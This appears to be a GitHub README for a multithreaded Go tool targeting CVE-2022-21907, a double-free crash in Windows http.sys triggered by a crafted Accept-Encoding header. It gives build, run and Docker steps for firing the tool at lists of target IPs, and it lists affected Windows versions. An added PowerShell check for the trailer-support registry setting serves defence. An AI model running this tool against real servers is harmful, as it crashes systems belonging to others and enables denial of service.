iveresk / cve-2022-21907

Multithread Golang application

CVE-2022-21907 Golang Application by 1vere$k

CVE-2022-21907 - Double Free in http.sys driver.

Summary

This is a multithreaded Golang application which makes requests to a few targets simultaneously.
It is not very productive with POST requests, but it is nearly 30% faster than a linear method.
An unauthenticated attacker can send an HTTP request whose "Accept-Encoding" request header triggers a double free in the unknown coding-list inside the HTTP Protocol Stack (http.sys) as it processes packets, resulting in a kernel crash.

Usage

Golang:

1. git clone https://github.com/iveresk/cve-2022-21907.git
2. cd cve-2022-21907
3. go build -o cve-2022-21907 cve-2022-21907.go
4. chmod +x cve-2022-21907
5. ./cve-2022-21907 -t <targetURL> [or <targetFile>]

Docker Building Local:

1. git clone https://github.com/iveresk/cve-2022-21907.git
2. cd cve-2022-21907
3. nano input.txt [enter your targets' IPs in this list]
4. docker build -t <tagName> .
   or: docker build --build-arg INPUT_FILE=<default_target_filename> -t <tagName> .
   [The Docker image uses a default file named "input.txt", but you may specify your own]
5. docker run -it <tagName>
   or: docker run -it -e INPUT_FILE=<target_filename> <tagName>

Docker Repository

docker pull masterrooot/cve-2022-21907:latest
docker run -it <tagName>
or: docker run -it -e INPUT_FILE=<target_filename> <tagName>

Vulnerable systems

  • Windows Server 2019 and Windows 10 version 1809: not vulnerable by default, unless HTTP Trailer Support has been enabled.
  • Windows 10 version 2004 (build 19041.450): vulnerable.
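
The trailer-support condition above can be checked on a host with the following PowerShell, an added example that is not part of this repository. It assumes the registry path and the EnableTrailerSupport value name given in Microsoft's advisory for this CVE (neither appears in this README), and that build 17763 identifies Windows Server 2019 and Windows 10 version 1809.

```powershell
# Added example, not part of the repository. Defensive check for the condition
# the README describes: on Windows Server 2019 / Windows 10 1809 the host is
# not vulnerable by default unless HTTP Trailer Support has been enabled.
# Assumption: registry path and value name are taken from Microsoft's advisory.
$HttpParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\HTTP\Parameters'
$ValueName  = 'EnableTrailerSupport'

function Get-TrailerSupportState {
    # Returns 'absent', 'disabled' (value 0) or 'enabled' (non-zero value).
    $prop = Get-ItemProperty -Path $HttpParams -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $prop) { return 'absent' }
    if ([int]$prop.$ValueName -ne 0) { return 'enabled' }
    return 'disabled'
}

function Get-HttpSysExposure {
    $os    = Get-CimInstance -ClassName Win32_OperatingSystem
    $build = [int]$os.BuildNumber
    $state = Get-TrailerSupportState

    if ($build -eq 17763) {
        # Build 17763 is both Windows Server 2019 and Windows 10 version 1809.
        if ($state -eq 'enabled') {
            $verdict = 'Trailer support enabled: install the security update; until then remove the value'
        } else {
            $verdict = 'Trailer support not enabled: default, non-vulnerable configuration'
        }
    } else {
        # For other builds the README gives no registry condition; patch level decides.
        $verdict = 'Registry value is not the deciding factor: verify the security update is installed'
    }

    [pscustomobject]@{
        Computer       = $env:COMPUTERNAME
        OS             = $os.Caption
        Build          = $build
        TrailerSupport = $state
        Assessment     = $verdict
    }
}

Get-HttpSysExposure | Format-List

# Mitigation on build 17763 when patching must wait (run elevated):
# Remove-ItemProperty -Path $HttpParams -Name $ValueName
```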

Contact

You are free to contact me via Keybase for any details.

License: MIT License

